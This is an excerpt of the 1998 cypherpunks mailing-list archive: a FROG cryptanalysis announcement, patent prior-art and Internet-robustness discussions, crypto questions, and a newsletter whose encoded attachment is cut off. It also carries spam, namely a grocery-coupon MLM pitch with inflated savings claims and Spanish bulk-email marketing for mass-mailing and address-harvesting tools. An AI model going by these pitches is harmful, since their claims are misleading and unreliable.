From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 16 Aug 1998 06:57:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Announcement: Cryptanalysis of Frog (an AES Candidate)
Message-ID: <199808161357.IAA02640@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


                                          Results Announcement:

D. Wagner, N. Ferguson, and B. Schneier, "Cryptanalysis of Frog," Counterpane Systems 
Report, Aug 1998.

                                                     Abstract:
We examine some attacks on the FROG cipher.  First we give a differential attack which 
uses about $2^{58}$ chosen plaintexts and very little time for the analysis; it works for 
about $2^{-33.0}$ of the keyspace.  Then we describe a linear attack which uses $2^{56}$ 
known texts and works for $2^{-31.8}$ of the keyspace.  The linear attack can also be 
converted to a ciphertext-only attack using $2^{64}$ known ciphertexts.  Also, the decryption 
function of FROG is a lot weaker than the encryption function.  We show a differential attack 
on the decryption function that requires $2^{36}$ chosen ciphertexts and works on $2^{-29.3}$ 
of the keyspace.  Using our best attack an attacker with a sufficient number of cryptanalytical 
targets can expect to recover his first key after $2^{56.7}$ work.   Taken together, these 
observations suggest that FROG is not a very strong candidate for the AES. 


This paper is available at http://www.counterpane.com/publish.html, and will be made available 
at the AES Workshop next week.

Cheers,
Bruce 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Millennium.Marketing
Date: Sun, 16 Aug 1998 13:33:36 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Food For Less
Message-ID: <199808162033.NAA14925@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Everybody Eats Food: and they will always buy GROCERIES! 


Greetings: 
I am sending you this only because Everybody, Everywhere can BENEFIT from this
program. I have received Bags of Testimonials STATING Everybody should Hear of this, 
so if you are Interested in Being Given $215.00 Please Read On. 

That is the bottom Line and one thing you can count on until the Earth stands still. 
If you had a chance to trade $25.00 for $240.00 would you do it, well that is what I 
am offering you today. 

This is how the program works, By using the certificates in the books, you receive 
grocery coupons of your choice, not chance, for products that you regularly purchase 
and use. The benefit to you is substantial savings on your grocery bills, due to 
having far more coupons for the products that you regularly purchase. 

We currently have an inventory in excess of 10 million coupons spanning over 1,200 
national, name-brand products. Product categories include: breakfast cereals and 
products, coffees and teas, frozen foods, paper products, laundry products,
household cleaners, personal care products, pet products, baby care products, and 
dozens of other categories of products purchased by thousands of people every day. 

What makes the program unique is that the Grocery Coupon Certificate Books allows 
you to choose coupons for the products that you already purchase and use. Instead of 
wasting time searching through the Sunday newspaper or magazines to find coupons, 
you simply fill in the product selections on the back of a grocery coupon 
certificate for coupons that you need. 

Then send the completed certificate to the warehouse and receive your grocery 
coupons within ten to fifteen working days. Each Grocery Coupon Certificate Book has 
a suggested retail price of $24.95 and contains twenty, ten-dollar grocery coupon 
certificates. In addition, each certificate book also contains four valuable Bonus 
Certificates. The certificates offer a phenomenal $240.00 in potential savings for a 
one-time, minimal investment.

However, if you take advantage of grocery stores that offer to double or even triple 
the face value of coupons on certain days, the potential savings from using the 
certificate books will be much greater. Because of this unique product, thousands of 
people across the country will have the freedom to choose the coupons they need and 
begin saving up to 50% or more off their grocery bills every time they shop.

"I urge anyone seeking a lucrative, ground-floor business opportunity to contact us 
immediately, so that they may take advantage of our incredible program and realize 
the fantastic savings and profits available to anyone who uses our Grocery Coupon 
Certificate Books."

It's easy to see why several top professionals in network marketing are saying that 
this is "by far the best MLM opportunity to surface in a very, very long time." For 
more information on purchasing a Grocery Coupon Certificate Book or becoming a 
distributor please call, Toll Free   1-888-512-6113, if busy or no answer. It is 
because of the over whelming response we've had on the Grocery Coupon Certificate 
Books and all of our operators are with customers, please leave your name and phone 
number and Customer Service will return your call. You also can e-mail us at 
discount_food@hotmail.com  If you want to purchase a coupon book send your address 
along with a $26.00 check or money order that is $25.00 plus $1.00 Shipping to.


Discount Food Connection
3006 W 34th suite #3
Anchorage, Alaska 99517



Allow 1 Week For Delivery



Thank You
Jerry Williams
Discount Food Connection


***********************************************************************************
If you are not interested in our Grocery Coupon Certificate Books, disregard this 
e-mail.
This is a one time mailing and only those that respond to this promotion 
will ever hear from us again. Thank You Discount Foods
************************************************************************************
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Sun, 16 Aug 1998 08:09:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Microsoft Electronic Commerce patent: Prior Art?
Message-ID: <199808161509.KAA09057@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


I just received this in email.

Bruce

------------begin forwarded message--------

Dear Bruce,

the Microsoft Patent 5,768,385 filed Aug. 29, 1995, issued Jun. 16, 1998
on "Untraceable Electronic Cash" is nothing more than a well written remake
of the "Anonymously Transferable Standard Values" presented at IFIP Sec
1986 under the name "Anonymous Standard Value Accounts", published both in
the Pre- and Post-Proceedings there, more detailed in a research report of
1987 and even published in a refereed journal, Computers & Security in
1989, see below.

I do not know the legal system of the US well enough to know whether
challenging the patent is worthwhile and I do neither have the time nor
money to do it for myself, but I think it is at least worthwhile for the
security community to know.

So please feel free to distribute this information, e.g. within CRYPTO-GRAM.

Yours Andreas

------------------------------------------------------------------------

Most of the references below can be downloaded at
http://www.semper.org/sirene/lit/sirene.lit.html

Holger Brk, Andreas Pfitzmann: Value transfer systems enabling security
and unobservability; Security and Protection in Information Systems
(IFIP/Sec. '86), A. Grissonnanche (ed.), North-Holland, 1989, 225-237.
(Superseded by the following BPf-papers.)

Holger Brk, Andreas Pfitzmann: Value Transfer Systems Enabling Security
and Unobservability; Interner Bericht 2/87, Fakultt fr Informatik,
Universitt Karlsruhe 1987.
(37 pages; Abstract and paper available online. See also BPf_89, BPf_90.)

BPf_89 Holger Brk, Andreas Pfitzmann: Digital Payment Systems Enabling
Security and Unobservability; Computers & Security 8/5 (1989) 399-416.
(Abstract and paper available online.)

BPf_90 Holger Brk, Andreas Pfitzmann: Value Exchange Systems Enabling
Security and Unobservability; Computers & Security 9/8 (1990) 715-721.
(Abstract and paper available online.)

------------------------------------------------------------------------

Andreas Pfitzmann

Technische Universitaet Dresden      Phone     (home) +49 351 3161973
Fakultaet Informatik                         (office) +49 351 4638277
Institut Theoretische Informatik          (secretary) +49 351 4638247
D 01062  Dresden                     Fax              +49 351 4638255
Germany                              e-mail  pfitza@inf.tu-dresden.de

------------end forwarded message-------- 
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Sun, 16 Aug 1998 08:49:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Announcement: Cryptanalysis of Frog (an AES Candidate)
In-Reply-To: <199808161357.IAA02640@mixer.visi.com>
Message-ID: <19980816154920.1075.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Bruce Schneier <schneier@counterpane.com> writes:

  > Results Announcement: ... "Cryptanalysis of Frog"...

Cool paper, Bruce.

But, fur crissakes, turn on some reasonable word wrapping so that it
doesn't look as if you're posting from AOL...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wardemon" <Wardemon@erols.com>
Date: Sun, 16 Aug 1998 17:27:53 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Defcon Social Engineering Contest
Message-ID: <003201bdc975$d5502d40$83c7accf@mzmigrodski>
MIME-Version: 1.0
Content-Type: text/plain




Can anyone who went to Defcon, let me know about the Social 
Engineering contest?... Was it elite or lame?  Who won... and who did they 
Social Engineer????
 
<A 
href="mailto:Wardemon@erols.com">Wardemon@erols.com


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bizemail@TheOffice.net
Date: Sun, 16 Aug 1998 21:22:48 -0700 (PDT)
To: bizemail@TheOffice.net
Subject: ADV: Una Mina de Oro -- Justo Bajo
Message-ID: <199808170327.WAA06720@ragnatela.net.mx>
MIME-Version: 1.0
Content-Type: text/plain


=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This message complies with the proposed United States 
Federal requirements for commercial e-mail bill, Section 301.

For additional info see: 
http://www.senate.gov/%7Emurkowski/commercialemail/EMailAmendOutline.html 

Required Sender Information:

Alberto Martinez 
Av. San Jeronimo 273, local 21-120
Tizapan Pedregal de San Angel
01908 Mexico, D. F., Mexico
Radio: (5) 447 11 11  pin 5550957 

Per Section 301, Paragraph (a)(2)(C) of S. 1618, further 
transmissions to you by the sender of this e-mail may be 
stopped at NO COST to you by sending a reply to this e-mail 
address with the word "remove" in the subject line. 
=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 


Tome solo unos minutos y mire hacia abajo.  Que es lo
que ve ?  Un tablero delgado de plastico lleno de teclas
sobre el ?  Que sentiria si le dijera que esas teclas
estan llenas de oro ?

Bueno,  es verdad ! Las teclas de su tablero fueron
LLENADAS con ORO PURO--solo permanezca sentado con la
mente abierta !

 Como ?

Por medio del Internet y... el Sistema BIZ-online.

Con un potencial de varios millones de personas, el
internet es el lugar ideal para promover un producto o
idea. Y lo maravilloso de esto es que usted puede
conseguir una presencia en la World Wide World como la
compaia mas grande , o quizas mas --

 SI USTED TIENE LA HERRAMIENTAS - Y -
  SI USTED SABE COMO USARLAS !

 >>>>>>>>>>>>>>>>>COMO LOS PROFESIONALES !
 >>>>>>>>>>>>>>>>>NOSOTROS LE ENSEAMOS COMO !

Esto es por lo que quiero hablarle del Sistema BIZ-online.
El Sistema BIZ-online es un recurso diseado para
proveerle las herramientas que le permitiran aprovechar
las TREMENDAS OPORTUNIDADES encontradas en el internet
marketing masivo -Y- ensearle a utilizarlas.

Es mas facil de lo que usted piensa...
Si conoce los secretos intrinsecos.

Como miembro del grupo del Sistema BIZ-online, usted
contara con el constante soporte de nuestra parte.
Usted sera cuidadosamente guiado paso a paso por el
camino de las GRANDES UTILIDADES obtenidas a traves
del mercadeo en linea tan exitoso hoy en dia.

Unos cuantos ejemplos de lo que ofrecemos son los
siguientes:

>Mas de 400 direcciones de clasificados GRATUITOS y de
ALTO TRAFICO de usuarios.

>45 categorias de grupos de discusion donde esta
permitido publicar anuncios comerciales.

>Un programa descompactador de archivos

>Un programa para bajar correctamente archivos de la red.

>Cuatro programas Software utilizados en el correo masivo


 No tiene un producto que ofrecer ?  No hay problema !

 El Sistema BIZ-online le provee uno !

*** Y ahora lo mejor de todo ! ***

 Usted puede generar $3,500 USD mensuales comercializando
el Sistema BIZ-online !

Imagine esto! GENERE DINERO en su tiempo libre, desde
la comodidad de su hogar !

Ya ve que facil es extraer el oro del teclado de su
ordenador con el Sistema BIZ-online.

Para obtener informacion amplia de esta apasionante
oportunidad, visite nuestro sitio en:

http://www.pakis.com/pages/biz/

o bien, envie un Email  insertando "BIZ" en el subject para
mas informacion.

Y solicite su  EXTRACTOR DE DIRECCIONES completamente
GRATIS.  Este software le sera enviado por E-mail en menos de
24 horas.

 Vea lo facil que es encontrar el camino a la prosperidad
a traves del internet marketing !

>>>>>>>>>>>>>>>>>>>>>Usted puede hacer que esto suceda.
>>>>>>>>>>>>>>>>>>>>>El Sistema BIZ-online lo hace posible.


Gracias.


Alberto Martinez
bizemail@TheOffice.net
http://www.pakis.com/pages/biz/










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 16 Aug 1998 23:22:52 -0700 (PDT)
To: Alex Alten <cypherpunks@toad.com
Subject: Re: Internet is rickety
In-Reply-To: <199808102320.SAA12845@mixer.visi.com>
Message-ID: <3.0.5.32.19980816232208.00bc7510@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


This isn't coderpunks material; I'm copying to cypherpunks instead.
(I've also removed letters@sjmercury.com from the Cc:.)

At 08:01 AM 8/16/98 -0700, Alex Alten wrote:
>Bruce,
>You are making it sound worse than it is.  The underlying network 
>routing infrastructure is designed to be extremely robust in the face 
>adverse conditions (originally it was nuclear attack).  I'm only aware 
>of two incidents that actually ground large parts of the Internet to a 
>halt.  The 1st involved a bug in the backbone rounters when the Internet 
>was young and had relatively few nodes.  The 2nd was the Morris worm 

Physical damage is one thing; logical-level damage is another.
Some newer vulnerabilities are the DNS system and routing protocols.

There was a major DNS failure a year or so ago when NSI or one of the
root servers published a garbled database; I don't remember details.
That's annoying, but easily noticed, and easy to work around,
and easier to prevent happening in the future.  But it's also easy
to trick the DNS root servers from outside (as Kashpureff did),
or mess with them inside (I forgot why Postel did that recently.)

A more serious problem occurred when some small ISP misconfigured
their Border Gateway Protocol parameters, announcing to the whole world
that their little T1 line was the best way to get almost anywhere
from almost anywhere else.  This was only mildly untrue until a
few large providers updated their tables to reflect it, at which point
their T1 started to melt, taking much of the Internet down with it.
This kind of thing _can_ happen again; the interesting problem
is what if somebody deliberately starts doing it a lot....

And much of the world's traffic goes through MAE-WEST and MAE-EAST,
as a way of getting between ISPs, though bigger carriers
have direct connections between their networks, and many small ISPs
at least have direct connections to their continent-wide carriers.
The MAEs and other NAPs get slow fairly often, and occasionally
just get fried; a major outage could be a serious problem,
so the fact that MAE-EAST lives in a parking garage in the DC area
may or may not bother you.

That's three ways that the whole Internet can have serious trouble;
there are presumably a number of others, if you believe in Murphy
or believe the L0pht's announcements.

Then there are more subtle problems - what happens if Altavista dies?
(Yes, there are other search engines, but probably 3-5 major ones.)
And there are the increasing number of portal and free email services from
Hotmail, Excite, Altavista, MyYahoo, Netscape, etc.,
which will take out large numbers of users' mail access if any of them dies.
And then there's AOL, which is probably a pretty robust design,
and which may or may not be missed by people on the _real_ Internet
if it dies for a while, but could also cut off lots of users from the net.

Also, much of the robustness derives from having _enough_ excess bandwidth
in the network that if you lose a good chunk of it, you'll still have
enough for the remaining users (the nuclear war scenario does reduce
the user population as well as the network...)  But you can get into
localized problems, for example the cable cut that trashed uunet's access 
to Florida the other week, and the Internet doesn't have a widespread priority
mechanism to identify "more important" traffic, though there are
many mechanisms for prioritizing individual users' networks.

It still works pretty well, but that doesn't mean it's not rickety.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Mon, 17 Aug 1998 00:15:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: none
Message-ID: <19980817071505.25599.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


Are there PGP for WindowsCE?
Thanks.


        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 17 Aug 1998 05:07:11 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: College professors, viagra & grades/Three breasted woman & single-breasted sister http://stuffed.net/98/8/17/
Message-ID: <19980817080001.20614.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/17/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 18 Aug 1998 00:39:27 -0700 (PDT)
To: Bruce Schneier <schneier@counterpane.com>
Subject: Private Doorbell - Re: CRYPTO-GRAM, August 15, 1998
In-Reply-To: <199808151730.MAA05817@mixer.visi.com>
Message-ID: <3.0.5.32.19980817092912.00b83100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schneier wrote in his newsletter
> It seems that every few months we get key-escrow repackaged with a new name.
> The latest new name is "Private Doorbell," and the spin is that the keys 
> are escrowed in the routers.  Other than the name, there's really 
> no difference between this and other key escrow schemes: 

Based on the talk by Elizabeth Kaufman from Cisco at the Bay Area
Cypherpunks meeting, I'd say you're wrong.  (I'm pleasantly surprised;
this is the first "compromise" I haven't rabidly disliked.)
(Elizabeth says not to blame her for the name, it's Cisco's PR folks' fault.)

The Private Doorbells proposal says that routers that encrypt
have a clear side and a black side, and if you want to wiretap them,
you can already wiretap the clear side, so Louis Freeh should be happy enough
(since it meets the "legitimate needs of law enforcement",
even though it the blocks no-warrant no-knock wiretaps he'd really like) 
so just give us the export permits we want and stay off our backs.
There's no special key escrow in the routers, it's just
doing what encrypting routers do already, and if Big Louie wants
to wiretap an ISP today, he can try to get a warrant and then do it.

It seems to me that there's a minor catch - routers with
multiple private-line encrypted interfaces can decrypt and
encrypt traffic without ever hauling it through an Ethernet
where it'd be easy to tap, but most of those configurations
still have an Ethernet somewhere, and any Bad Guy who's doing encryption
at the endpoints ought to be using end-to-end encryption anyway.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fade <fade@mail1.i1.net>
Date: Mon, 17 Aug 1998 08:55:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Adobe Acrobat encryption details
Message-ID: <Pine.BSI.3.95.980817105445.1266A-100000@mail1.i1.net>
MIME-Version: 1.0
Content-Type: text/plain



Hi all,

I was hoping someone might be able to point me to details on .PDF file
encryption.  I'm specifically interested in key-generation (which hash is
used?) and if there is consistant known-plaintext in .PDF file headers.

I've searched around, and all I can find is that Acrobat uses rc4, which
isn't very helpful...

Thanks!

-=fade=-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mparson@dp-austin.net
Date: Mon, 17 Aug 1998 09:42:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Adobe Acrobat encryption details
In-Reply-To: <Pine.BSI.3.95.980817105445.1266A-100000@mail1.i1.net>
Message-ID: <199808171641.LAA05889@fargo.imtdirect.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.BSI.3.95.980817105445.1266A-100000@mail1.i1.net>, you write:
> 
> Hi all,
> 
> I was hoping someone might be able to point me to details on .PDF file
> encryption.  I'm specifically interested in key-generation (which hash is
> used?) and if there is consistant known-plaintext in .PDF file headers.
> 
> I've searched around, and all I can find is that Acrobat uses rc4, which
> isn't very helpful...

I don't have any info on this sort of thing, but you can check out the
latest versions of Ghostscript (at least the 4.01 version I've got
installed), it has ps2pdf conversion utils, might give you an idea on
how they encode 'em.

--
Michael Parson
Systems Administrator
IXC Communications, Inc.
The Data Place - Austin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 17 Aug 1998 10:27:01 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 17, 1998
Message-ID: <199808171721.MAA25790@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/   for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00002.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00002.bin"
Content-Description: "_CTIA_Daily_News_19980817.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxjZW50ZXI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMTcsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPlNuYXB0cmFjayBMYXVuY2hlcyBGaXJz
dApQdWJsaWMgVHJpYWwgb2YgU29mdHdhcmUtQmFzZWQmbmJzcDs8QlI+Cldp
cmVsZXNzIExvY2F0aW9uIFRlY2hub2xvZ3k8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+RGV2ZWxvcGVkIGJ5IFNuYXB0
cmFjaywgdGhlIHRlY2hub2xvZ3kKd2lsbCBhbGxvdyBjZWxsdWxhciBwaG9u
ZSB1c2VycyB0byB0cmFuc21pdCB0aGVpciBsb2NhdGlvbnMgdG8gOTExIGVt
ZXJnZW5jeS1zeXN0ZW0Kb3BlcmF0b3JzLiBUaGUgc3lzdGVtIGludm9sdmVz
IHRoZSBlbXBsb3ltZW50IG9mIHNwZWNpYWwgc29mdHdhcmUgaW5zaWRlCnRo
ZSBjZWxsdWxhciBoYW5kc2V0IHRoYXQgd2lsbCBwZXJtaXQgYSBjZW50cmFs
IG9mZmljZSBzeXN0ZW0gdG8gdXNlIGdsb2JhbApwb3NpdGlvbmluZyB0ZWNo
bm9sb2d5IHRvIGRldGVjdCB0aGUgbG9jYXRpb24gb2YgdGhlIGNhbGxlci4g
VGhlIHRyaWFsLAppbmZsdWVuY2VkIGJ5IHRoZSBGQ0MgbWFuZGF0ZSByZXF1
aXJpbmcgd2lyZWxlc3Mgc2VydmljZSBjYXJyaWVycyB0byBwcm92aWRlCmFj
Y3VyYXRlIDkxMSBpbmZvcm1hdGlvbiBieSBPY3RvYmVyIDIwMDEsIGlzIGJl
aW5nIHJ1biBieSB0aGUgY2l0eSBvZiBEZW52ZXIsCkRlbnZlciBDb3VudHks
IGFuZCBBZGFtcyBDb3VudHksIENvbG8uIFRoZSBwcm9kdWN0IHdpbGwgYmUg
YWRvcHRlZCBieSBOVFQsCkphcGFuJ3MgdGVsZWNvbW11bmljYXRpb24gZ2lh
bnQsIHdoaWNoIHdpbGwgaW5zdGFsbCBpdCBpbiBhIHdpcmVsZXNzIHBhbG0K
Y29tcHV0ZXIgc2V0IHRvIGJlIHJlbGVhc2VkIGluIHRoZSBzZWNvbmQgcXVh
cnRlciBvZiBuZXh0IHllYXIuIEFpclRvdWNoLApBbWVyaXRlY2gsIEJlbGwg
TW9iaWxpdHksIEdURSwgUHJpbWVDbywgU3ByaW50IFBDUywgYW5kIFUgUyBX
RVNUIGFyZSBjb2xsZWN0aXZlbHkKYWNjZXNzaW5nIHRoZSB0ZWNobm9sb2d5
LiAoPEEgSFJFRj0iaHR0cDovL3d3dy5ueXRpbWVzLmNvbS9saWJyYXJ5L3Rl
Y2gvOTgvMDgvYml6dGVjaC9hcnRpY2xlcy8xN2NlbGx1bGFyLmh0bWwiPk5F
VwpZT1JLIFRJTUVTPC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhv
by5jb20vYncvOTgwODE3L3NuYXB0cmFja18xLmh0bWwiPllBSE9PPC9BPik8
L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9KzE+Q1RJQSBBc2tzIGZvciBMaWFiaWxpdHkKUHJvdGVjdGlvbiBh
bmQgQ29zdC1SZWNvdmVyeSZuYnNwOzxCUj4Kd2hlbiBXaXJlbGVzcyBDb21w
YW5pZXMgUHJvdmlkZSA5LTEtMSBTZXJ2aWNlPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNUSUGScyBmaWxpbmcgY2Fs
bHMgb24gdGhlIEZDQyB0byBhY3QKdG8gcHJvdmlkZSBuYXRpb24td2lkZSBs
aWFiaWxpdHkgcHJvdGVjdGlvbiBmb3Igd2lyZWxlc3Mgc2VydmljZSBwcm92
aWRlcnMKd2hlbiB0aGVpciBzeXN0ZW1zIGFyZSB1c2VkIHRvIGNvbm5lY3Qg
Y2FsbGVycyB0byBlbWVyZ2VuY3kgc2VydmljZXMuICg8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3Mv
ZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMxODkiPldPVy1DT008L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5VLlMuIENlbGwtUGhvbmUgVXNlcnMKRmF2b3IgRGlnaXRhbCBT
ZXJ2aWNlOyZuYnNwOzxCUj4KRXJpY3Nzb24gTGVhZHMgTWFrZXJzPC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkFjY29y
ZGluZyB0byBtYXJrZXQgcmVzZWFyY2hlciBEYXRhcXVlc3QsCmRpZ2l0YWwg
c2VydmljZXMnIHBvcHVsYXJpdHkgY29udGludWVzIHRvIHJpc2UuIEFjY29y
ZGluZyB0byB0aGUgZmlybSwKZGlnaXRhbCBwaG9uZSBzYWxlcy0td2hpY2gg
cXVhZHJ1cGxlZCBsYXN0IHllYXIgdG8gNS42IG1pbGxpb24tLXdpbGwgYWNj
b3VudApmb3IgaGFsZiBvZiBhbGwgY2VsbHVsYXIgcGhvbmUgc2FsZXMgdGhp
cyB5ZWFyLiBUZWxlZm9uIEFCIEwuTS4gRXJpY3Nzb24Kb2YgU3dlZGVuIHdh
cyB0aGUgdG9wIG1ha2VyIG9mIGRpZ2l0YWwgaGFuZHNldHMgbGFzdCB5ZWFy
